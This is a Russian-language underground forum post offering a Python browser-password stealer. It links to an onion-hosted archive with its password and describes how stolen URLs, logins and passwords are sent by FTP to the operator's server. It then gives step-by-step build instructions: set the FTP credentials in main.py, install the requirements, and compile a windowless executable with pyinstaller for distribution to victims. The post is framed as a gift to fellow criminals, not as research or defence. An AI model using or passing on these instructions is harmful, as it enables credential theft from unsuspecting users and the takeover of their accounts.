[СТИЛЛЕР ПАРОЛЕЙ БРАУЗЕРОВ] Python исходники ¶
By: Kryptoman on 2019-01-11 08 ч.
[СТИЛЛЕР ПАРОЛЕЙ БРАУЗЕРОВ] Python исходники
Приветсвую вас форумчане. Порылся у себя в файлах и нашел мой самый первый стиллер, написаный этак в 2015 и на удивление, без всяких правок - он работает, и работает отлично. Да, конечно, понимаю, python не самый лучший выбор, я не знаю чем я тогда руководствовался.
Ссылка на архив с исходниками https://hellfileifys4vnk. onion/jZYDGVS (убрать пробел перед onion) , пароль: iphoneshit273 .
Обычный стиллер, пересылает логи вида:
URL: sourlsite.com/login.php
LOGIN: mystpdnick
PASSWORD: mysecrespass
В текстовом файле по ftp на ваш сервер, бесплатных хостингов предостаточно, не знаю можно ли их тут публиковать, а то подумают что пиар какой-нить... Найти их не сложно.
Краткая инструкция.
1. Устанавливаем python 3.6, устанавливаем библиотеки с req.txt
2. Открываем main.py любым текстовым редактором, видим переменные HOST, USERNAME, PASSWORD. Вместо того конченного бреда что я там написал, пишите свои данные с хостинга.
3. Устанавливаем все необходимые библиотеки из req.txt
pip install -r req.txt
4. После установки выбираем понравившийся вам компилятор для python, я бы советовал использовать cx_freeze (тот кто знает сделает сам), а мы воспользуемся простым pyinstaller'ом.
pyinstaller --windowed --onefile main.py
5. Ваш билд в папке dist, а айфон под подушкой. Удачи.
Даже картинку вставить не разрешили, но думаю вам и так будет интересно. Код в неких местах смешон. Но работает и между прочим, не знаю зачем задокументирпован. Какие тут долгие таймауты между сообщениями...